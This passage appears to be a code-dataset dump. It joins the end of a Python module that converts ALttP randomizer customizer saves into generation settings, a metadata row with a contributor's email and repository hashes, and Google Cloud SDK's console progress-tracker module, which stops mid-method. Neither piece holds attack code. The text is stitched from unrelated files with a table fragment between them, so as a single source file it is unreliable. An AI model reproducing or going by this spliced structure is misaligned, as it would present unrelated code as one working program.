                "SilverArrowUpgrade": 0,
                "Rupoor": 0,
                "RedClock": 0,
                "BlueClock": 0,
                "GreenClock": 0,
                "ProgressiveSword": 4,
                "ProgressiveShield": 3,
                "ProgressiveArmor": 2,
                "ProgressiveGlove": 2,
                "ProgressiveBow": 2,
                "Triforce": 0,
                "TriforcePiece": 0,
                "MapA2": 1,
                "MapD7": 1,
                "MapD4": 1,
                "MapP3": 1,
                "MapD5": 1,
                "MapD3": 1,
                "MapD6": 1,
                "MapD1": 1,
                "MapD2": 1,
                "MapA1": 0,
                "MapP2": 1,
                "MapP1": 1,
                "MapH1": 0,
                "MapH2": 1,
                "CompassA2": 1,
                "CompassD7": 1,
                "CompassD4": 1,
                "CompassP3": 1,
                "CompassD5": 1,
                "CompassD3": 1,
                "CompassD6": 1,
                "CompassD1": 1,
                "CompassD2": 1,
                "CompassA1": 0,
                "CompassP2": 1,
                "CompassP1": 1,
                "CompassH1": 0,
                "CompassH2": 0,
                "BigKeyA2": 1,
                "BigKeyD7": 1,
                "BigKeyD4": 1,
                "BigKeyP3": 1,
                "BigKeyD5": 1,
                "BigKeyD3": 1,
                "BigKeyD6": 1,
                "BigKeyD1": 1,
                "BigKeyD2": 1,
                "BigKeyA1": 0,
                "BigKeyP2": 1,
                "BigKeyP1": 1,
                "BigKeyH1": 0,
                "BigKeyH2": 0,
                "KeyH2": 1,
                "KeyH1": 0,
                "KeyP1": 0,
                "KeyP2": 1,
                "KeyA1": 2,
                "KeyD2": 1,
                "KeyD1": 6,
                "KeyD6": 3,
                "KeyD3": 3,
                "KeyD5": 2,
                "KeyP3": 1,
                "KeyD4": 1,
                "KeyD7": 4,
                "KeyA2": 4
            }
        },
        "drop": {
            "count": {
                "Bee": 0,
                "BeeGood": 0,
                "Heart": 13,
                "RupeeGreen": 9,
                "RupeeBlue": 7,
                "RupeeRed": 6,
                "BombRefill1": 7,
                "BombRefill4": 1,
                "BombRefill8": 2,
                "MagicRefillSmall": 6,
                "MagicRefillFull": 3,
                "ArrowRefill5": 5,
                "ArrowRefill10": 3,
                "Fairy": 1
            }
        }
    }
}
def convert2settings(
        customizer_save,
        tournament=False,
        spoilers="off",
        spoilers_ongen=False):
    """Converts a customizer-settings.json file from alttpr.com to a settings dictionary that can be used for generating a game.

    Starts from a deep copy of BASE_CUSTOMIZER_PAYLOAD and overlays every
    non-null value found in the save. Keys that are absent, or present with a
    null value, leave the corresponding default untouched.

    Arguments:
        customizer_save {dict} -- A dictionary of the customizer-settings.json file (needs to already be converted to a dict)

    Keyword Arguments:
        tournament {bool} -- Setting to True generates a race rom, which excludes the spoiler log. (default: {False})
        spoilers {str} -- Sets the spoiler mode. (default: {"off"})
        spoilers_ongen {bool} -- Sets spoiler mode to "generate". This is deprecated. (default: {False})

    Returns:
        dict -- a dictionary of settings that can be used with pyz3r.alttpr()
    """
    if spoilers_ongen:
        spoilers = "generate"

    settings = copy.deepcopy(BASE_CUSTOMIZER_PAYLOAD)
    settings['tournament'] = tournament
    settings['spoilers'] = spoilers

    def _overlay(mappings):
        """Copies each non-null saved value onto the given settings path."""
        for save_key, path in mappings:
            value = customizer_save.get(save_key)
            if value is None:
                continue
            target = settings
            for part in path[:-1]:
                target = target[part]
            target[path[-1]] = value

    # Straight key-to-path copies from the save file into the payload.
    _overlay([
        ('randomizer.glitches_required', ('glitches',)),
        ('randomizer.accessibility', ('accessibility',)),
        ('randomizer.goal', ('goal',)),
        ('randomizer.tower_open', ('crystals', 'tower')),
        ('randomizer.ganon_open', ('crystals', 'ganon')),
        ('randomizer.dungeon_items', ('dungeon_items',)),
        ('randomizer.item_placement', ('item_placement',)),
        ('randomizer.world_state', ('mode',)),
        ('randomizer.hints', ('hints',)),
        ('randomizer.weapons', ('weapons',)),
        ('randomizer.item_pool', ('item', 'pool')),
        ('randomizer.item_functionality', ('item', 'functionality')),
        ('randomizer.boss_shuffle', ('enemizer', 'boss_shuffle')),
        ('randomizer.enemy_shuffle', ('enemizer', 'enemy_shuffle')),
        ('randomizer.enemy_damage', ('enemizer', 'enemy_damage')),
        ('randomizer.enemy_health', ('enemizer', 'enemy_health')),
        ('randomizer.pot_shuffle', ('enemizer', 'pot_shuffle')),
        # vt.custom.prizepacks
        ('vt.custom.prizepacks', ('drops',)),
        # vt.custom.drops
        ('vt.custom.drops', ('drop', 'count')),
    ])

    # These two sections are merged key-by-key into settings['custom'] so
    # that unspecified custom defaults survive; applied before the item
    # counts below, matching the original application order.
    for save_key in ('vt.custom.settings', 'vt.custom.glitches'):
        overrides = customizer_save.get(save_key)
        if overrides is not None:
            for key, value in overrides.items():
                settings['custom'][key] = value

    _overlay([
        ('vt.custom.items', ('custom', 'item', 'count')),
        ('vt.custom.locations', ('l',)),
        ('vt.custom.notes', ('notes',)),
        ('vt.custom.name', ('name',)),
    ])

    # Starting equipment entries are expanded into a flat item-name list.
    equipment = customizer_save.get('vt.custom.equipment')
    if equipment is not None:
        eq = []
        for key, value in equipment.items():
            eq += get_starting_equipment(key, value)
        settings['eq'] = eq

    return settings
def get_starting_equipment(key, value):
    """Expands one customizer equipment entry into a list of item names.

    Bottles and the staged items (bow, boomerang, ocarina) map a numeric
    selection to specific items; 'Rupees' is broken down greedily into the
    largest rupee denominations; anything else simply repeats the key
    ``int(value)`` times.
    """
    bottle_contents = {
        1: 'Bottle',
        2: 'BottleWithRedPotion',
        3: 'BottleWithGreenPotion',
        4: 'BottleWithBluePotion',
        5: 'BottleWithBee',
        6: 'BottleWithGoldBee',
        7: 'BottleWithFairy',
    }
    staged_items = {
        'ProgressiveBow': {
            1: ['SilverArrowUpgrade'],
            2: ['Bow'],
            3: ['BowAndSilverArrows'],
        },
        'Boomerang': {
            1: ['Boomerang'],
            2: ['RedBoomerang'],
            3: ['Boomerang', 'RedBoomerang'],
        },
        'Ocarina': {
            1: ['OcarinaInactive'],
            2: ['OcarinaActive'],
        },
    }
    rupee_denominations = (
        (300, 'ThreeHundredRupees'),
        (100, 'OneHundredRupees'),
        (50, 'FiftyRupees'),
        (20, 'TwentyRupees'),
        (5, 'FiveRupees'),
        (1, 'OneRupee'),
    )

    if key in ('Bottle1', 'Bottle2', 'Bottle3', 'Bottle4'):
        content = bottle_contents.get(value)
        return [content] if content else []
    if key in staged_items:
        return list(staged_items[key].get(value, []))
    if key == 'Rupees':
        remaining = int(value)
        eq = []
        for denomination, name in rupee_denominations:
            quantity, remaining = divmod(remaining, denomination)
            eq += quantity * [name]
        return eq
    return int(value) * [key]
| [
"tcprescott@gmail.com"
] | tcprescott@gmail.com |
7753d769b8a13f8066b9d01a11ef57c4dd5cac07 | 70fa6468c768d4ec9b4b14fc94fa785da557f1b5 | /lib/googlecloudsdk/core/console/progress_tracker.py | d4ac99b25f6a93b8f2e0f9a192a04a62669bc014 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | kylewuolle/google-cloud-sdk | d43286ef646aec053ecd7eb58566ab2075e04e76 | 75f09ebe779e99fdc3fd13b48621fe12bfaa11aa | refs/heads/master | 2020-04-20T22:10:41.774132 | 2019-01-26T09:29:26 | 2019-01-26T09:29:26 | 169,131,028 | 0 | 0 | NOASSERTION | 2019-02-04T19:04:40 | 2019-02-04T18:58:36 | Python | UTF-8 | Python | false | false | 42,381 | py | # -*- coding: utf-8 -*- #
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Progress Tracker for Cloud SDK."""
# TODO(b/113319639): Temporary skip to get pytype enabled.
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import abc
import os
import signal
import sys
import threading
import time
import enum
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.console import console_attr
from googlecloudsdk.core.console import console_io
from googlecloudsdk.core.console import multiline
import six
def ProgressTracker(
    message=None, autotick=True, detail_message_callback=None, tick_delay=1,
    interruptable=True,
    aborted_message=console_io.OperationCancelledError.DEFAULT_MESSAGE):
  """Creates a context manager that reports long-running progress to the user.

  The concrete tracker returned depends on the configured interactive UX
  style and on whether stderr is an interactive terminal.

  Args:
    message: str, The message to show next to the spinner.
    autotick: bool, True to have the spinner tick on its own. Otherwise, you
      need to call Tick() explicitly to move the spinner.
    detail_message_callback: func, A no argument function that will be called
      and the result appended to message each time it needs to be printed.
    tick_delay: float, The amount of time to wait between ticks, in second.
    interruptable: boolean, True if the user can ctrl-c the operation. If so,
      it will stop and will report as aborted. If False, a message will be
      displayed saying that it cannot be cancelled.
    aborted_message: str, A custom message to put in the exception when it is
      cancelled by the user.

  Returns:
    The progress tracker.
  """
  ux_style = properties.VALUES.core.interactive_ux_style.Get()
  if ux_style == properties.VALUES.core.InteractiveUXStyles.OFF.name:
    return _NoOpProgressTracker(interruptable, aborted_message)
  if ux_style == properties.VALUES.core.InteractiveUXStyles.TESTING.name:
    return _StubProgressTracker(message, interruptable, aborted_message)
  # Interactive terminals get the in-place spinner; everything else gets the
  # append-only variant.
  if console_io.IsInteractive(error=True):
    tracker_class = _NormalProgressTracker
  else:
    tracker_class = _NonInteractiveProgressTracker
  return tracker_class(
      message, autotick, detail_message_callback, tick_delay, interruptable,
      aborted_message)
class _BaseProgressTracker(six.with_metaclass(abc.ABCMeta, object)):
  """A context manager for telling the user about long-running progress.

  Subclasses choose how progress is rendered by implementing Tick() and
  _Print(). This base class owns the shared state (message, tick count, done
  flag), the optional autotick background thread, and the SIGINT handling
  that turns ctrl-c into OperationCancelledError.
  """

  def __init__(self, message, autotick, detail_message_callback, tick_delay,
               interruptable, aborted_message):
    self._stream = sys.stderr
    if message is None:
      # Spinner-only mode: show tick marks but no leading message text.
      self._spinner_only = True
      self._message = ''
      self._prefix = ''
    else:
      self._spinner_only = False
      self._message = message
      self._prefix = message + '...'
    self._detail_message_callback = detail_message_callback
    self._ticks = 0
    self._done = False
    # Guards _done and the output stream against interleaving between the
    # autotick thread and the main thread.
    self._lock = threading.Lock()
    self._tick_delay = tick_delay
    self._ticker = None
    console_width = console_attr.ConsoleAttr().GetTermSize()[0]
    if console_width < 0:
      # This can happen if we're on a pseudo-TTY. Set it to 0 and also
      # turn off output to prevent hanging.
      console_width = 0
    self._output_enabled = log.IsUserOutputEnabled() and console_width != 0
    # Don't bother autoticking if we aren't going to print anything.
    self.__autotick = autotick and self._output_enabled
    self._interruptable = interruptable
    self._aborted_message = aborted_message
    self._old_signal_handler = None
    self._symbols = console_attr.GetConsoleAttr().GetProgressTrackerSymbols()

  @property
  def _autotick(self):
    return self.__autotick

  def _GetPrefix(self):
    # Appends the dynamic detail message (if any) to the static prefix.
    if self._detail_message_callback:
      detail_message = self._detail_message_callback()
      if detail_message:
        return self._prefix + ' ' + detail_message + '...'
    return self._prefix

  def _SetUpSignalHandler(self):
    """Sets up a signal handler for handling SIGINT."""
    def _CtrlCHandler(unused_signal, unused_frame):
      if self._interruptable:
        raise console_io.OperationCancelledError(self._aborted_message)
      else:
        with self._lock:
          sys.stderr.write('\n\nThis operation cannot be cancelled.\n\n')
    try:
      self._old_signal_handler = signal.signal(signal.SIGINT, _CtrlCHandler)
      self._restore_old_handler = True
    except ValueError:
      # Only works in the main thread. Gcloud does not run in the main thread
      # in gcloud interactive.
      self._restore_old_handler = False

  def _TearDownSignalHandler(self):
    if self._restore_old_handler:
      try:
        signal.signal(signal.SIGINT, self._old_signal_handler)
      except ValueError:
        pass  # only works in main thread

  def __enter__(self):
    # Setup signal handlers
    self._SetUpSignalHandler()
    log.file_only_logger.info(self._GetPrefix())
    self._Print()
    if self._autotick:
      def Ticker():
        # Background thread: sleep, tick, and exit once Tick() reports done.
        while True:
          _SleepSecs(self._tick_delay)
          if self.Tick():
            return
      self._ticker = threading.Thread(target=Ticker)
      self._ticker.start()
    return self

  def __exit__(self, unused_ex_type, exc_value, unused_traceback):
    with self._lock:
      self._done = True
      # If an exception was raised during progress tracking, exit silently here
      # and let the appropriate exception handler tell the user what happened.
      if exc_value:
        # This is to prevent the tick character from appearing before 'failed.'
        # (ex. 'message...failed' instead of 'message.../failed.')
        if isinstance(exc_value, console_io.OperationCancelledError):
          self._Print('aborted by ctrl-c.\n')
        else:
          self._Print('failed.\n')
      elif not self._spinner_only:
        self._Print('done.\n')
    # Wait for the autotick thread to observe _done and exit before
    # restoring the previous SIGINT handler.
    if self._ticker:
      self._ticker.join()
    self._TearDownSignalHandler()

  @abc.abstractmethod
  def Tick(self):
    """Give a visual indication to the user that some progress has been made.

    Output is sent to sys.stderr. Nothing is shown if output is not a TTY.

    Returns:
      Whether progress has completed.
    """
    pass

  @abc.abstractmethod
  def _Print(self, message=''):
    """Prints an update containing message to the output stream."""
    pass
class _NormalProgressTracker(_BaseProgressTracker):
  """A context manager for telling the user about long-running progress.

  Interactive (TTY) variant: renders the prefix plus an animated spinner
  updated in place via multiline.SimpleSuffixConsoleOutput.
  """

  def __enter__(self):
    self._SetupOutput()
    return super(_NormalProgressTracker, self).__enter__()

  def _SetupOutput(self):
    # Builds the single console message that _Print() updates in place.
    def _FormattedCallback():
      if self._detail_message_callback:
        detail_message = self._detail_message_callback()
        if detail_message:
          return ' ' + detail_message + '...'
      return None

    self._console_output = multiline.SimpleSuffixConsoleOutput(self._stream)
    self._console_message = self._console_output.AddMessage(
        self._prefix, detail_message_callback=_FormattedCallback)

  def Tick(self):
    """Give a visual indication to the user that some progress has been made.

    Output is sent to sys.stderr. Nothing is shown if output is not a TTY.

    Returns:
      Whether progress has completed.
    """
    with self._lock:
      if not self._done:
        self._ticks += 1
        # Advance the spinner one frame, wrapping around the frame list.
        self._Print(self._symbols.spin_marks[
            self._ticks % len(self._symbols.spin_marks)])
      return self._done

  def _Print(self, message=''):
    """Reprints the prefix followed by an optional message.

    If there is a multiline message, we print the full message and every
    time the Prefix Message is the same, we only reprint the last line to
    account for a different 'message'. If there is a new message, we print
    on a new line.

    Args:
      message: str, suffix of message
    """
    if self._spinner_only or not self._output_enabled:
      return
    self._console_output.UpdateMessage(self._console_message, message)
    self._console_output.UpdateConsole()
class _NonInteractiveProgressTracker(_BaseProgressTracker):
  """A context manager for telling the user about long-running progress.

  Non-TTY variant: each tick appends a '.' to the stream instead of
  animating a spinner in place.
  """

  def Tick(self):
    """Give a visual indication to the user that some progress has been made.

    Output is sent to sys.stderr. Nothing is shown if output is not a TTY.

    Returns:
      Whether progress has completed.
    """
    with self._lock:
      if not self._done:
        self._Print('.')
      return self._done

  def _Print(self, message=''):
    """Reprints the prefix followed by an optional message.

    If there is a multiline message, we print the full message and every
    time the Prefix Message is the same, we only reprint the last line to
    account for a different 'message'. If there is a new message, we print
    on a new line.

    Args:
      message: str, suffix of message
    """
    if self._spinner_only or not self._output_enabled:
      return
    # Since we are not in a tty, print will be called twice outside of normal
    # ticking. The first time during __enter__, where the tracker message should
    # be outputted. The second time is during __exit__, where a status updated
    # contained in message will be outputted.
    display_message = self._GetPrefix()
    self._stream.write(message or display_message + '\n')
    return
class _NoOpProgressTracker(object):
  """Progress tracker variant that renders no output at all.

  Still installs a SIGINT handler so ctrl-c semantics (abort vs. ignore)
  match the visible trackers.
  """

  def __init__(self, interruptable, aborted_message):
    self._interruptable = interruptable
    self._aborted_message = aborted_message
    self._done = False

  def __enter__(self):
    def _HandleCtrlC(unused_signal, unused_frame):
      # Non-interruptable operations silently swallow ctrl-c here.
      if not self._interruptable:
        return
      raise console_io.OperationCancelledError(self._aborted_message)

    self._old_signal_handler = signal.signal(signal.SIGINT, _HandleCtrlC)
    return self

  def Tick(self):
    return self._done

  def __exit__(self, exc_type, exc_val, exc_tb):
    self._done = True
    signal.signal(signal.SIGINT, self._old_signal_handler)
class _StubProgressTracker(_NoOpProgressTracker):
  """A Progress tracker that only prints deterministic start and end points.

  No UX about tracking should be exposed here. This is strictly for being able
  to tell that the tracker ran, not what it actually looks like.
  """

  def __init__(self, message, interruptable, aborted_message):
    super(_StubProgressTracker, self).__init__(interruptable, aborted_message)
    self._stream = sys.stderr
    self._message = message or ''

  def __exit__(self, exc_type, exc_val, exc_tb):
    # Translate the exception outcome into a deterministic status label.
    if not exc_val:
      outcome = 'SUCCESS'
    elif isinstance(exc_val, console_io.OperationCancelledError):
      outcome = 'INTERRUPTED'
    else:
      outcome = 'FAILURE'

    if log.IsUserOutputEnabled():
      stub_record = console_io.JsonUXStub(
          console_io.UXElementType.PROGRESS_TRACKER,
          message=self._message, status=outcome)
      self._stream.write(stub_record + '\n')
    return super(_StubProgressTracker, self).__exit__(exc_type, exc_val, exc_tb)
def _SleepSecs(seconds):
  """Sleep int or float seconds. For mocking sleeps in this module.

  Wrapped so tests can patch this single symbol instead of time.sleep.
  """
  time.sleep(seconds)
def CompletionProgressTracker(ofile=None, timeout=4.0, tick_delay=0.1,
                              background_ttl=60.0, autotick=True):
  """Returns a tracker giving visual feedback during long-running completions.

  A completion that exceeds the timeout is assumed to be refreshing the cache.
  At that point the progress tracker displays '?', forks the cache operation
  into the background, and exits. This gives the background cache update a
  chance finish. After background_ttl more seconds the update is forcibly
  exited (forced to call exit rather than killed by signal) to prevent hung
  updates from proliferating in the background.

  Args:
    ofile: The stream to write to.
    timeout: float, The amount of time in second to show the tracker before
      backgrounding it.
    tick_delay: float, The time in second between ticks of the spinner.
    background_ttl: float, The number of seconds to allow the completion to
      run in the background before killing it.
    autotick: bool, True to tick the spinner automatically.

  Returns:
    The completion progress tracker.
  """
  ux_style = properties.VALUES.core.interactive_ux_style.Get()
  silent_styles = (properties.VALUES.core.InteractiveUXStyles.OFF.name,
                   properties.VALUES.core.InteractiveUXStyles.TESTING.name)
  if ux_style in silent_styles:
    return _NoOpCompletionProgressTracker()
  return _NormalCompletionProgressTracker(
      ofile, timeout, tick_delay, background_ttl, autotick)
class _NormalCompletionProgressTracker(object):
  """A context manager for visual feedback during long-running completions.

  A completion that exceeds the timeout is assumed to be refreshing the cache.
  At that point the progress tracker displays '?', forks the cache operation
  into the background, and exits. This gives the background cache update a
  chance finish. After background_ttl more seconds the update is forcibly
  exited (forced to call exit rather than killed by signal) to prevent hung
  updates from proliferating in the background.
  """

  # File descriptor used for completer status output; presumably reserved by
  # the shell completion integration -- confirm before changing.
  _COMPLETION_FD = 9

  def __init__(self, ofile, timeout, tick_delay, background_ttl, autotick):
    """Initializes the tracker.

    Args:
      ofile: The stream to write to, or None to dup the completion fd.
      timeout: float, Seconds to spin before backgrounding the completion.
      tick_delay: float, Seconds between spinner ticks.
      background_ttl: float, Seconds the backgrounded completion may run.
      autotick: bool, True to tick the spinner automatically via SIGVTALRM.
    """
    self._ofile = ofile or self._GetStream()
    self._timeout = timeout
    self._tick_delay = tick_delay
    self.__autotick = autotick
    self._background_ttl = background_ttl
    self._ticks = 0
    self._symbols = console_attr.GetConsoleAttr().GetProgressTrackerSymbols()

  def __enter__(self):
    if self._autotick:
      # Drive the spinner off the virtual interval timer so ticking happens
      # while the completer itself is computing.
      self._old_handler = signal.signal(signal.SIGVTALRM, self._Spin)
      self._old_itimer = signal.setitimer(
          signal.ITIMER_VIRTUAL, self._tick_delay, self._tick_delay)
    return self

  def __exit__(self, unused_type=None, unused_value=True,
               unused_traceback=None):
    if self._autotick:
      signal.setitimer(signal.ITIMER_VIRTUAL, *self._old_itimer)
      signal.signal(signal.SIGVTALRM, self._old_handler)
    if not self._TimedOut():
      # Erase the last spinner mark.
      self._WriteMark(' ')

  def _TimedOut(self):
    """True if the tracker has timed out."""
    return self._timeout < 0

  def _Spin(self, unused_sig=None, unused_frame=None):
    """Rotates the spinner one tick and checks for timeout."""
    self._ticks += 1
    self._WriteMark(self._symbols.spin_marks[
        self._ticks % len(self._symbols.spin_marks)])
    self._timeout -= self._tick_delay
    if not self._TimedOut():
      return
    # Timed out.
    self._WriteMark('?')
    # Exit the parent process.
    if os.fork():
      os._exit(1)  # pylint: disable=protected-access
    # Allow the child to run in the background for up to self._background_ttl
    # more seconds before being forcefully exited.
    signal.signal(signal.SIGVTALRM, self._ExitBackground)
    signal.setitimer(
        signal.ITIMER_VIRTUAL, self._background_ttl, self._background_ttl)
    # Suppress the explicit completion status channel. stdout and stderr have
    # already been suppressed.
    self._ofile = None

  def _WriteMark(self, mark):
    """Writes one mark to self._ofile, backing up so the next mark overwrites."""
    if self._ofile:
      self._ofile.write(mark + '\b')
      self._ofile.flush()

  @staticmethod
  def _ExitBackground(unused_signal=None, unused_frame=None):
    """Unconditionally exits the background completer process after timeout.

    Installed as the SIGVTALRM handler; the signal module invokes handlers
    with (signum, frame) arguments, so the previous zero-argument signature
    would have raised TypeError when the timer fired (the mismatch was only
    masked by a pytype suppression at the installation site).
    """
    os._exit(1)  # pylint: disable=protected-access

  @property
  def _autotick(self):
    return self.__autotick

  @staticmethod
  def _GetStream():
    """Returns the completer output stream."""
    return os.fdopen(
        os.dup(_NormalCompletionProgressTracker._COMPLETION_FD), 'w')
class _NoOpCompletionProgressTracker(object):
  """Completion progress tracker variant that renders nothing at all."""

  def __init__(self):
    pass

  def __enter__(self):
    return self

  def __exit__(self, exc_type, exc_val, exc_tb):
    pass
def StagedProgressTracker(
    message, stages, tracker_id=None, autotick=True, tick_delay=0.1,
    interruptable=True, done_message_callback=None, success_message=None,
    failure_message=None,
    aborted_message=console_io.OperationCancelledError.DEFAULT_MESSAGE):
  """Creates a progress tracker for an action with multiple stages.

  The returned object is a context manager. Within the context, call
  StartStage to begin displaying a stage, UpdateStage to change its detail
  message, and CompleteStage/FailStage when a stage finishes. Stages do not
  need to be started or completed in order; in non-multiline output mode the
  displayed stage is the earliest started stage that has not yet completed.

  Example:
    stages = [get_bread, get_pb_and_j, make_sandwich]
    with StagedProgressTracker(
        'Making sandwich...',
        stages,
        success_message='Time to eat!',
        failure_message='Time to order delivery..!',
        tracker_id='meta.make_sandwich') as tracker:
      tracker.StartStage(get_bread)
      tracker.UpdateStage(get_bread, 'Looking for bread in the pantry')
      tracker.CompleteStage(get_bread, 'Got some whole wheat bread!')
      tracker.StartStage(get_pb_and_j)
      if pb_not_found:
        tracker.FailStage(get_pb_and_j, exceptions.NoPeanutButterError())

  Args:
    message: str, The message to show next to the spinner.
    stages: list[Stage], A list of stages for the progress tracker to run.
    tracker_id: str The ID of this tracker that will be used for metrics.
    autotick: bool, True to have the spinner tick on its own. Otherwise, you
      need to call Tick() explicitly to move the spinner.
    tick_delay: float, The amount of time to wait between ticks, in second.
    interruptable: boolean, True if the user can ctrl-c the operation. If so,
      it will stop and will report as aborted.
    done_message_callback: func, A callback to get a more detailed done
      message.
    success_message: str, A message to display on success of all tasks.
    failure_message: str, A message to display on failure of a task.
    aborted_message: str, A custom message to put in the exception when it is
      cancelled by the user.

  Returns:
    The progress tracker.
  """
  ux_style = properties.VALUES.core.interactive_ux_style.Get()
  if ux_style == properties.VALUES.core.InteractiveUXStyles.OFF.name:
    return _NoOpStagedProgressTracker(stages, interruptable, aborted_message)
  if ux_style == properties.VALUES.core.InteractiveUXStyles.TESTING.name:
    return _StubStagedProgressTracker(
        message, stages, interruptable, aborted_message)
  # Pick the richest renderer the terminal supports.
  if not console_io.IsInteractive(error=True):
    tracker_cls = _NonInteractiveStagedProgressTracker
  elif console_attr.ConsoleAttr().SupportsAnsi():
    tracker_cls = _MultilineStagedProgressTracker
  else:
    tracker_cls = _NormalStagedProgressTracker
  return tracker_cls(
      message, stages, success_message, failure_message, autotick,
      tick_delay, interruptable, aborted_message, tracker_id,
      done_message_callback)
class Stage(object):
  """One unit of work tracked by a staged progress tracker."""

  def __init__(self, header, task_id=None):
    """Encapsulates a stage in a staged progress tracker.

    A task should contain a message about what it does and define a function
    that performs said task.

    Args:
      header: (str) High level description of what the task is doing, e.g.
        'Uploading files'.
      task_id: (str) The ID of this task that will be used for metrics.
        timing metrics. NOTE: Metrics are currently not implemented yet.
    """
    # TODO(b/109928970): Add support for progress bars.
    # TODO(b/109928025): Add support for timing metrics by task id.
    self._header = header
    self.task_id = task_id
    # Detail text for this stage; presumably updated through the tracker's
    # UpdateStage method.
    self.message = ''
    # Completion bookkeeping, managed by the owning tracker.
    self._is_done = False
    self.status = StageCompletionStatus.NOT_STARTED

  @property
  def header(self):
    return self._header

  @property
  def is_done(self):
    return self._is_done


class StageCompletionStatus(enum.Enum):
  """Indicates the completion status of a stage."""
  NOT_STARTED = 'not started'
  RUNNING = 'still running'
  SUCCESS = 'done'
  FAILED = 'failed'
  INTERRUPTED = 'interrupted'
class _StagedProgressTrackerInterface(six.with_metaclass(abc.ABCMeta, object)):
  """Interface for staged progress trackers.

  Concrete implementations render the stages passed to the constructor and
  expose the Start/Update/Complete/Fail lifecycle methods below.
  """

  def __init__(self, stages):
    self._stages = stages

  @abc.abstractmethod
  def __enter__(self):
    pass

  @abc.abstractmethod
  def __exit__(self, unused_ex_type, exc_value, unused_traceback):
    pass

  @abc.abstractmethod
  def Tick(self):
    """Give a visual indication to the user that some progress has been made.

    Output is sent to sys.stderr. Nothing is shown if output is not a TTY.

    Returns:
      Whether progress has completed.
    """
    pass

  @abc.abstractmethod
  def _Print(self, message=''):
    """Prints an update containing message to the output stream."""
    pass

  def UpdateHeaderMessage(self, message):
    """Updates the header message if supported. No-op by default."""
    pass

  @abc.abstractmethod
  def StartStage(self, stage):
    """Informs the progress tracker that this stage has started."""
    pass

  @abc.abstractmethod
  def UpdateStage(self, stage, message):
    """Updates a stage in the progress tracker."""
    pass

  @abc.abstractmethod
  def CompleteStage(self, stage, message=None):
    """Informs the progress tracker that this stage has completed."""
    pass

  @abc.abstractmethod
  def FailStage(self, stage, exception):
    """Informs the progress tracker that this stage has failed."""
    pass
class _BaseStagedProgressTracker(
        six.with_metaclass(abc.ABCMeta, _StagedProgressTrackerInterface)):
    """Base class for staged progress trackers.

    During each tick, the tracker checks if there is a stage being displayed by
    checking if _stage_being_displayed is not None. If it is not none and stage
    has not completed, then the tracker will print an update. If the stage is
    done, then the tracker will write out the status of all completed stages
    in _running_stages_queue.
    """

    def __init__(self, message, stages, success_message, failure_message,
                 autotick, tick_delay, interruptable, aborted_message,
                 tracker_id, done_message_callback):
        super(_BaseStagedProgressTracker, self).__init__(stages)
        # All tracker output goes to stderr so stdout stays clean.
        self._stream = sys.stderr
        # TODO(b/111637901): Support detailed message callback when true multiline
        # support is available.
        self._message = message
        self._success_message = success_message
        self._failure_message = failure_message
        self._aborted_message = aborted_message
        self._done_message_callback = done_message_callback
        self._tracker_id = tracker_id
        console_width = console_attr.ConsoleAttr().GetTermSize()[0]
        if console_width < 0:
            # This can happen if we're on a pseudo-TTY. Set it to 0 and also
            # turn off output to prevent hanging.
            console_width = 0
        self._output_enabled = log.IsUserOutputEnabled() and console_width != 0
        # Don't bother autoticking if we aren't going to print anything.
        self.__autotick = autotick and self._output_enabled
        self._interruptable = interruptable
        self._tick_delay = tick_delay
        self._symbols = console_attr.GetConsoleAttr().GetProgressTrackerSymbols()
        self._done = False
        self._exception_is_uncaught = True
        self._ticks = 0
        self._ticker = None  # Background autotick thread, started in __enter__.
        self._running_stages = set()
        self._completed_stages = []
        # Guards all mutable tracker state. threading.Lock is not reentrant,
        # so code holding it must call Tick()/_PrintExitOutput() only after
        # releasing it (see CompleteStage/FailStage below).
        self._lock = threading.Lock()

    @property
    def _autotick(self):
        return self.__autotick

    def _SetUpSignalHandler(self):
        """Sets up a signal handler for handling SIGINT."""
        def _CtrlCHandler(unused_signal, unused_frame):
            if self._interruptable:
                raise console_io.OperationCancelledError(self._aborted_message)
            else:
                self._NotifyUninterruptableError()
        try:
            self._old_signal_handler = signal.signal(signal.SIGINT, _CtrlCHandler)
            self._restore_old_handler = True
        except ValueError:
            # Only works in the main thread. Gcloud does not run in the main thread
            # in gcloud interactive.
            self._restore_old_handler = False

    def _NotifyUninterruptableError(self):
        with self._lock:
            sys.stderr.write('\n\nThis operation cannot be cancelled.\n\n')

    def _TearDownSignalHandler(self):
        if self._restore_old_handler:
            try:
                signal.signal(signal.SIGINT, self._old_signal_handler)
            except ValueError:
                pass  # only works in main thread

    def __enter__(self):
        self._SetupOutput()
        # Setup signal handlers
        self._SetUpSignalHandler()
        log.file_only_logger.info(self._message)
        self._Print()
        if self._autotick:
            def Ticker():
                # Daemon loop: sleep, then tick until the tracker reports done.
                while True:
                    _SleepSecs(self._tick_delay)
                    if self.Tick():
                        return
            self._ticker = threading.Thread(target=Ticker)
            self._ticker.daemon = True
            self._ticker.start()
        return self

    def __exit__(self, unused_ex_type, exc_value, unused_traceback):
        with self._lock:
            self._done = True
            # If an exception was raised during progress tracking, exit silently here
            # and let the appropriate exception handler tell the user what happened.
            if exc_value:
                if self._exception_is_uncaught:
                    self._HandleUncaughtException(exc_value)
            else:
                self._PrintExitOutput()
        # Join outside the lock: the ticker thread's Tick() must be able to
        # acquire the lock, observe _done, and return.
        if self._ticker:
            self._ticker.join()
        self._TearDownSignalHandler()

    def _HandleUncaughtException(self, exc_value):
        # The first print is to signal exiting the stage. The second print
        # handles the output for exiting the progress tracker.
        if isinstance(exc_value, console_io.OperationCancelledError):
            self._PrintExitOutput(aborted=True)
        else:
            # This means this was an uncaught exception. This ideally
            # should be handled by the implementer
            self._PrintExitOutput(failed=True)

    @abc.abstractmethod
    def _SetupOutput(self):
        """Sets up the output for the tracker. Gets called during __enter__."""
        pass

    def _GetTickMark(self, ticks):
        """Returns the next tick mark."""
        # NOTE(review): indexes with self._ticks and ignores the `ticks`
